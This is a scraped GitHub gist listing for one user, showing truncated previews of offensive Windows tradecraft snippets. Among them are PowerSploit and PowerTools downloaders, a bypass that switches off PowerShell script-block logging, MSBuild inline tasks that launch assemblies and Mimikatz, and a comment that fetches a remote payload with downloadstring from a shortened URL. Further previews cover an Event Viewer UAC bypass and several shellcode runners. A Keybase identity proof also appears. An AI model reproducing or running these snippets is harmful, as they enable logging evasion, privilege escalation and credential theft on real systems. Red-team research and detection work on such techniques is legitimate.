Dave Hardy davehardy20

  • UK
View powertools-downloader.ps1
Remove-Module PowerView -ErrorAction SilentlyContinue
Remove-Module PowerUp -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip"
$file = "$($env:TEMP)\PowerTools.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
View powersploit-downloader.ps1
Remove-Module PowerSploit -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/mattifestation/PowerSploit/archive/master.zip"
$file = "$($env:TEMP)\PowerSploit.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
@davehardy20
davehardy20 / keybase.md
Created Jun 24, 2017
Android created Gist
View keybase.md

Keybase proof

I hereby claim:

  • I am davehardy20 on github.
  • I am davehardy20 (https://keybase.io/davehardy20) on keybase.
  • I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo

To claim this, I am signing this object:

View bypass.xml
<?xml version="1.0"?>
<command>
<![CDATA[
function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
@davehardy20
davehardy20 / msbuilder.xml
Created Jul 27, 2017
MSBuild Execute Assembly From Environment Variable
View msbuilder.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
<!-- Populate the Env Var like this or many other ways: -->
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of ability to customize the build process -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
@davehardy20
davehardy20 / EventVwrBypass.cs
Created Jul 27, 2017
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
View EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@davehardy20
davehardy20 / katz.xml
Created Jul 27, 2017
MSBuild - Mimikatz - Server 2016
View katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@davehardy20
davehardy20 / PoCPowerShellCoreShellcodeRunner.ps1
Created Jul 27, 2017
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
View PoCPowerShellCoreShellcodeRunner.ps1
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>
function Invoke-VirtualAlloc {
Param (
[IntPtr] $lpAddress,
[UInt32] $dwSize,
[UInt32] $flAllocationType,
@davehardy20
davehardy20 / evil.cs
Created Jul 27, 2017
Execute a DLL via Regsvr32
View evil.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
class Test
{
@davehardy20
davehardy20 / shellcode.js
Created Jul 27, 2017
Execute ShellCode Via Jscript.NET
View shellcode.js
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js